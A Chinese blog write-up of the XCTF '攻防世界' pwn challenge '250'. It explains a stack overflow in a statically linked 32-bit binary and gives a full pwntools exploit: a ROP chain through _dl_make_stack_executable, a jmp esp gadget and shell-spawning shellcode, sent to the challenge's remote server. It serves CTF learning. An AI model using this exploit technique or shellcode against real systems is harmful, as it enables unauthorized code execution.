攻防世界(pwn)250

最新推荐文章于 2022-01-01 14:13:14 发布
最新推荐文章于 2022-01-01 14:13:14 发布
阅读量505 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/105056413
版权

前言:

此题说难也不是很难,但是需要一些基础知识,否则利用起来比较困难。
在这里插入图片描述
只开了NX保护的32位程序。
在这里插入图片描述

此题里面的功能函数几乎都是自己写的,所以说没有一点基础知识,利用起来还是挺麻烦的。
我们看到里面有一个自己写的print函数
在这里插入图片描述
我们点进去发现,由于size是我们自己决定的,所以里面存在一个栈溢出漏洞。
但是我们并不知道远端的libc环境版本,函数几乎自写,我们基本没什么信息可以利用,所以传统的栈溢出利用方法利用起来很麻烦(只是我觉得,有可能大佬觉得很简单)。
这时,我们就需要观察函数中有没有我们可以利用的,一看,woc,直接就几百上千个函数。(攻防世界评论区有人说这是道眼力题,我觉得很在理,哈哈哈)

_dl_make_stack_executable函数。按照意思是可以将栈变为可执行
–引自于bluestar628的博客

我们这个题目也是有这个函数的,并且利用方法也和上面那篇博客一样。
我们先找到这个函数
在这里插入图片描述
在这里我们找到这个函数
在这里插入图片描述
要想利用这个函数,我们还要满足eax的值是__libc_stack_end,我们就需要把ebp+arg_10那填充为__libc_stack_end。由于arg_10为0x18,我们把ebp填充为__libc_stack_end - 0x18就可以了。
在这里插入图片描述
我们在调用完_dl_make_stack_executable_hook后,为了程序流程仍然会跳转到我们构造的ROP上去,我们需要改变函数,使得判定不成立。
最后我们构造的ROP链为:

payload = 'a' * 0x3a + p32(0x080a0b05 - 0x18)
payload += p32(pop_ecx) + p32(_dl_make_stack_exe_hook) + p32(inc_ecx)
payload += p32(call_dl_make_stack_exe) + p32(jmp_esp) + asm(shellcraft.i386.linux.sh())

我们使用inc dword ptr [ecx] 来使得函数地址加一位,导致值不匹配,使得程序流程回到我们的ROP链上。
完整exp:

#! /usr/bin/env python
from pwn import *

local = 0
if local:
    p = process('./250')
else:
    p = remote('111.198.29.45', 39411)

debug = 0
if debug:
    context.log_level = 'debug'

elf = ELF('./250')
_dl_make_stack_exe_hook = elf.sym['_dl_make_stack_executable_hook']
inc_ecx = 0x080845f8
pop_ecx = 0x080df1b9
jmp_esp = 0x080de2bb
call_dl_make_stack_exe = 0x0809a260

p.sendlineafter('SSCTF[InPut Data Size]', str(0x100))
payload = 'a' * 0x3a + p32(0x080a0b05 - 0x18)
payload += p32(pop_ecx) + p32(_dl_make_stack_exe_hook) + p32(inc_ecx)
payload += p32(call_dl_make_stack_exe) + p32(jmp_esp) + asm(shellcraft.i386.linux.sh())

p.sendlineafter('SSCTF[YourData]', payload)
p.interactive()

参考链接:

https://blog.csdn.net/bluestar628/article/details/81007516

https://blog.csdn.net/seaaseesa/article/details/104188302

PLpa、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界PWN250题解
seaaseesa的博客
02-05 1054
250 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序存在明显的栈溢出漏洞 并且glibc被静态编译到了程序中 由于没有开启PIE,且glibc被静态编译包含,那么我们有很多方式get shell,这里,我们使用的是dl_make_stack_executable使得栈变得可执行,然后在栈里布下shellcode来getshell 为了节省步骤,我们直接...
CSAW CTF 2015 PWN250
lxx_nico的专栏
09-23 1498
CSAW CTF 2015 PWN250思路参考: https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/CSAWCTF/pwn/contacts https://www.whitehatters.academy/csaw-2015-prequals-exploit-250-contacts/ http://gee
[攻防世界 pwn]——warmup
Y_peak的博客
02-20 623
[攻防世界 pwn]——warmup 题目地址: https://adworld.xctf.org.cn/ 题目: 嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。 提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。 我们只有挨个尝试, 写个exp如下: exploit from pwn i
攻防世界pwn新手区整理
Lenard404的博客
08-19 3127
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 495
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
Sokoban_Game:推箱子游戏
06-27
推箱子_游戏 推箱子游戏 用Java语言开发来模拟推箱子游戏。 该项目包括在每个控制台用 Java 语言模拟推箱子游戏(仓库管理器),其中包括在平面上的特定点放置盒子,为此需要实现各种数据结构和分辨率算法,以提供...
browser-pwn-advent-calendar
05-28
总的来说,Browser Pwn Advent Calendar提供了一个互动的学习平台,让参与者能够提升在JavaScript和浏览器安全领域的技能,通过实践来应对现实世界中的威胁。通过完成这些挑战,不仅可以增强对浏览器漏洞的理解,也...
攻防世界)(pwn)hacknote
PLpa的博客
07-31 3407
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
安全多方计算技术(Security Multi-Party Computation, SMC)
热门推荐
百川汇海
06-08 1万+
一、 什么是安全多方计算? 为了说明什么是安全多方计算,首先我们先介绍几个实际生活中的例子。 1. Alice认为她的了某种遗传疾病,想验证自己的想法。正好她知道Bob有一个关于疾病的DNA模型的数据库。如果她把自己的DNA样品寄给Bob,那么Bob可以给出她的DNA的诊断结果。但是Alice又不想别人知道,这是她的隐私。所以,她请求Bob帮忙诊断自己DNA的方式是不可行的。因为这样Bob就知道了她的DNA及相关私人信息。 2. 经过一次花费昂贵的市场调查后,A公司决定扩展在某些地区的市场份额来获取丰厚的回
Pwn
bluestar628的博客
07-11 2468
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
ld.linux.so源码分析--dl_main
yejing's utopia
04-13 4405
本章分析ld.so的主体dl_main,这个函数非常复杂,只论篇幅就占了这个c文件的一半以上。 static void dl_main (const ElfW(Phdr) *phdr, ElfW(Word) phnum, ElfW(Addr) *user_entry) {   const ElfW(Phdr) *ph;   enum mode mode;   str
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 2784
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
攻防世界 WEB leaking
qq_41696858的博客
08-25 375
这题考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一题来举个例吧 先看一下代码 "use strict"; var randomstring = require("
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1659
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界PWN之cnss题解
seaaseesa的博客
02-14 744
Cnss 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,发现是一个服务器程序,每接收到连接请求后就会fork一个子进程来处理。 代码太长,看似很复杂 我们发现eval函数存在栈溢出,并且由于没有开启PIE,那么我们只需要泄露了canary的值就能轻松ROP了。 关键是canary泄露不了。然而,我们可以一字节一字节的爆破它。我们知道,canary的值是随机...
Complex Calc Writeup
子曰小玖的博客
05-23 342
https://sploitfun.wordpress.com/2016/03/07/bkp-ctf-complex-calc-writeup/ This ELF binaryis almost same assimple calcelf with some minor change!! Tofigure out what that change is, I first ran simp...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值